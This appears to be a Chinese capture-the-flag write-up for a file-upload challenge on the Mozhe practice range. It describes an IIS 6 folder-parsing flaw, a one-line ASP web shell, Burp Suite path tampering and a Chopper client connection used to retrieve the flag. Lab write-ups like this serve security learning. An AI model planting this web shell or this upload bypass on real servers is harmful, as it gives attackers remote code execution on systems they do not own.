点击靶场网页,提示我们要上传一个文件,ii6有一个漏洞,在asp的文件夹下的txt也会被当做asp文件运行。所以我们先上传一个文本写入一句话木马<%eval request (“pass”)%>(pass可以根据自己喜好更改)。然后开启浏览器代理,运行burp suite,捕抓上传文件的数据包,抓到包后,把数据包send to Repeater。更改上传的路径将upload更改为asd.asp(xxx.asp),这样我们就创建了一个asp文件夹。
在线靶场-墨者-文件上传1星-内部文件上传系统漏洞分析溯源
接着使用菜刀输入IP地址加我们所创建的路径地址和文件,输入口令,木马类型。
在线靶场-墨者-文件上传1星-内部文件上传系统漏洞分析溯源
连接获取读取权限后,可看到KEY_2466610284.asp这个文件,打开该文件即可获得key。
在线靶场-墨者-文件上传1星-内部文件上传系统漏洞分析溯源

相关文章:

  • 2021-12-07
  • 2021-12-28
  • 2021-06-15
  • 2022-12-23
  • 2021-09-15
  • 2021-11-26
  • 2021-07-22
猜你喜欢
  • 2021-05-01
  • 2021-12-13
  • 2021-08-14
  • 2021-10-19
  • 2021-06-10
  • 2022-12-23
相关资源
相似解决方案